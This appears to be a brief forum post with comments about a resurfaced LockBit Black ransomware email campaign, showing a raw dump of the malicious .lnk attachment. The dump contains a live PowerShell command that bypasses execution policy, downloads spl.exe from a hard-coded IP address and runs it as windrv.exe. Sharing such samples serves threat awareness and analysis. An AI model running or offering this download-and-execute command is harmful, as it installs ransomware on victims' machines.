Ransomeware mail campaign from May 2024 is active again
https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email looks like this:
cat Document/Document.doc.lnk L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' shell32.dll�%windir%\System32\cmd.exe%windir%\System32\cmd.exe�%� �wN��]N�D.��Q���`�Xdesktop-4mksc1r~N8��jEJ�s@d����u^Y��'� ~N8��jEJ�s@d����u^Y��'� � ��1SPS��XF�L8C���&�m�m-S-1-5-21-711635060-3631344071-1154681243-50091SPS�mD��pH�H@.�=x�hHN�!"0
2 comments
[ 4.7 ms ] story [ 18.3 ms ] threadBummer, I would've loved to analyze this spl.exe encryptor and maybe also troll the attacker
Also fyi, somehow, exiftool supports .lnk files so you can read the full command of the lnk cleanly with that.